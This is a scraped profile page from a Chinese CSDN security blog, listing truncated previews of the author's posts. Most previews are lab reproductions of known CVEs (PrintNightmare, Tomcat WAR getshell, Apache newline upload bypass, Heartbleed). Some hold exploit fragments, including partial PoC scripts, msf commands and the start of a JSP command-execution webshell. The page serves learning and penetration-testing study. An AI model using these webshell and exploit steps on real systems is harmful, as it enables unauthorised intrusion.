p_utao
码龄5年
关注
提问 私信
  • 博客:84,358
    84,358
    总访问量
  • 80
    原创
  • 778,270
    排名
  • 24
    粉丝
  • 0
    铁粉

个人简介:那蝉,囊括了整个夏天,那把剑,倾覆了大半个天下。

IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:北京市
  • 加入CSDN时间: 2019-07-18
博客简介:

p_utao的博客

查看详细资料
个人成就
  • 获得40次点赞
  • 内容获得41次评论
  • 获得173次收藏
  • 代码片获得881次分享
创作历程
  • 1篇
    2022年
  • 35篇
    2021年
  • 46篇
    2020年
成就勋章
TA的专栏
  • 渗透测试
    29篇
  • 前端
    3篇
  • 后渗透内网提权
    17篇
  • 渗透测试工具
    3篇
  • 学习琐事
    2篇
  • java编程
    1篇
  • kali linux
    7篇
  • 安全运维
    6篇
  • python编程
    13篇
  • PWN
  • 数据库
    2篇
兴趣领域 设置
  • 网络空间安全
    web安全
创作活动更多

如何做好一份技术文档?

无论你是技术大神还是初涉此领域的新手,都欢迎分享你的宝贵经验、独到见解与创新方法,为技术传播之路点亮明灯!

175人参与 去创作
  • 最近
  • 文章
  • 代码仓
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

复现myucms v2.1.1022漏洞

myucms漏洞复现
原创
发布博客 2022.08.19 ·
1956 阅读 ·
1 点赞 ·
1 评论 ·
1 收藏

vue常用全局api

directive用法:案例:<html><head></head><body> <div id="app"> <div v-color="color"> 自定义指令变色 </div> </div> <script src="https://cdn.jsdelivr.net/npm/vue@2.6.14/dist/vue.js"></script> &l
原创
发布博客 2021.08.17 ·
278 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

vue父子组件的传值

父传子案例:<html><head></head><body> <div id="app"> <f></f> </div> <script src="https://cdn.jsdelivr.net/npm/vue@2.6.14/dist/vue.js"></script> <script type="x-template" id="f"> &
原创
发布博客 2021.08.16 ·
267 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

Vue.component用法

用法:Vue.component( id, [definition] )参数:{string} id{Function | Object} [definition]具体参考:https://vuejs.bootcss.com/api/?#Vue-component案例:<html><head>Vue.js</head><body> <div id="app"> <div> <miao>&l
原创
发布博客 2021.08.16 ·
582 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

微软通杀漏洞-CVE-2021-1675复现

环境win2008受害机IP:10.20.102.80kali攻击机IP:10.20.102.71需要一个普通的域用户,开启Spooler服务安装impacketgit clone https://github.com/cube0x0/impacketcd impacketsudo python3 ./setup.py install开启匿名访问smb配置/etc/samba/smb.conf[global]map to guest = Bad Userserver rol
原创
发布博客 2021.07.14 ·
419 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

01 ATT&CK红队靶场

1
原创
发布博客 2021.05.31 ·
337 阅读 ·
0 点赞 ·
2 评论 ·
0 收藏

复现锐捷RG-UAC系统账号密码信息泄露漏洞编写poc/exp(CNVD-2021-14536)

漏洞演示访问地址f12查看源代码md5解码:md5加密解码40b5daa2352b825d66b8080617408284reach123登录成功poc/exp验证import requestsimport redef start(headers): with open("1.txt", "r") as f: for f1 in f: f2 = f1.strip() try:
原创
发布博客 2021.04.10 ·
897 阅读 ·
0 点赞 ·
3 评论 ·
0 收藏

dvwa学习编写exp

sql注入报错expimport requestsimport re//cookie验证登录cookies = {"PHPSESSID":'jjfrgqtge5n0a03ge127ti8ttk','security':'low'}//可能存在sql注入地址url = "http://127.0.0.1/vulnerabilities/sqli/?Submit=Submit%23&id=1"//index()函数用于从列表中找出某个值第一个匹配项的索引位置//split()通过指定分
原创
发布博客 2021.04.09 ·
298 阅读 ·
0 点赞 ·
2 评论 ·
0 收藏

整理应急响应的流程

网络安全的应急响应windows检查:1.系统进程2.计算机用户3.系统登录日志4.连接状态5.开机自启动6.数据库日志7.网站木马和系统木马linux检查:同上网络安全的调查取证流程:1.保护现场2.证据发现3.证据固定4.证据提取5.证据分析6.提交证据网络安全的网络取证工具:wireshark...
原创
发布博客 2021.03.21 ·
418 阅读 ·
0 点赞 ·
0 评论 ·
2 收藏

CVE-2015-5254(ActiveMQ 反序列化漏洞)复现

漏洞介绍Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。漏洞复现http://10.7.10.41:8161/admin默认账号密码:admin登陆成功
原创
发布博客 2021.03.19 ·
458 阅读 ·
0 点赞 ·
2 评论 ·
1 收藏

Tomcat弱口令+war部署getshell

影响版本全版本漏洞复现msf爆破use auxiliary/scanner/http/tomcat_mgr_login设置IP和端口set rhosts 10.7.10.41set rport 8080(默认端口)run运行tomcat:tomcat登陆成功用大佬的jsp一句话马<% if("123".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtim
原创
发布博客 2021.03.18 ·
238 阅读 ·
0 点赞 ·
1 评论 ·
0 收藏

CVE-2017-15715(apache换行解析漏洞)复现

漏洞解析此漏洞的出现是由于 apache 在修复第一个后缀名解析漏洞时,用正则来匹配后缀。在解析 php 时 xxx.php\x0A 将被按照php 后缀进行解析,导致绕过一些服务器的安全策略。漏洞复现访问地址制作一句话木马上传木马抓包在这里插入图片描述添加个0a...
原创
发布博客 2021.03.18 ·
482 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

CVE-2014-0160(OpenSSL心脏滴血漏洞)

漏洞背景早在2014年,互联网安全协议OpenSSL被曝存在一个十分严重的安全漏洞。在黑客社区,它被命名为“心脏出血”,表明网络上出现了“致命内伤”。利用该漏洞,黑客可以获取约30%的https开头网址的用户登录账号密码,其中包括购物、网银、社交、门户等类型的知名网站。Heartbleed漏洞是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就
原创
发布博客 2021.03.17 ·
865 阅读 ·
1 点赞 ·
0 评论 ·
0 收藏

CVE-2017-7525(jackson反序列漏洞)

漏洞原理Jackson-databind 支持 Polymorphic Deserialization 特性(默认情况下不开启),当 json 字符串转换的 Target class 中有 polymorph fields,即字段类型为接口、抽象类或 Object 类型时,攻击者可以通过在 json 字符串中指定变量的具体类型 (子类或接口实现类),来实现实例化指定的类,借助某些特殊的 class,如 TemplatesImpl,可以实现任意代码执行。详见:https://blog.csdn.net/x
原创
发布博客 2021.03.17 ·
930 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

windows本地提权CVE-2018-8120复现

漏洞描述部分版本Windows系统win32k.sys组件的NtUserSetImeInfoEx()系统服务函数内部未验证内核对象中的空指针对象,普通应用程序可利用该空指针漏洞以内核权限执行任意代码影响版本:Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 for 32-bit Systems Service
原创
发布博客 2021.03.12 ·
244 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

java小案例

Scanner类计算package com.demo;import java.util.Scanner; //导入包public class hello { public static void main(String[] args) { Scanner sc = new Scanner(System.in); //使用类先创建对象 System.out.println("请输入第一个数:"); int i = sc.nextInt();
原创
发布博客 2021.03.09 ·
243 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

docker命令学习

docker容器docker ps:查看容器运行docker ps -a:查看所有容器运行docker ps -l:查询最后安装的容器docker run:运行docker logs:查看容器内的标准输出docker stop:停止容器docker restart:重启docker top:查看容器内部运行的进程docker rm -f 1e560fca3906:删除容器docker port bf08b7f2cd89:查看容器端口的映射情况进入容器: 1. docker att
原创
发布博客 2021.03.08 ·
181 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

win10安装docker程序

开启 Hyper-V控制面板 --- 程序 --- 程序和功能 --- 启用和关闭windows功能 --- hype -vdocker下载地址:https://hub.docker.com/?overlay=onboarding安装重启打开 PowerShell 并运行以下命令检测是否运行成功:docker run hello-worlddocker映像加速https://www.runoob.com/docker/docker-mirror-acceleration.html.
原创
发布博客 2021.03.08 ·
119 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

MS14-064 漏洞复现

背景Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本…模块:exploit/windows/browser/ms14_064_ole_code_execution复现系统IPlinux10.7.10.43win710.7.10.49msf6 > search ms14-064
原创
发布博客 2021.03.05 ·
829 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

Bagecms v3.1.3代码审计

先复现下大佬挖到的漏洞任意文件读取漏洞点:protected\modules\admini\controllers\TemplateController.php如下actionUpdateTpl函数调用了file_get_contents对传入的filename文件名的文件内容进行读取,如下filename参数在传入file_get_contents函数之前调用CHtml::encode方法进行了处理。跟进CHtml::encode方法路径:framework\yiilite.php发
原创
发布博客 2021.03.04 ·
1084 阅读 ·
0 点赞 ·
3 评论 ·
0 收藏
加载更多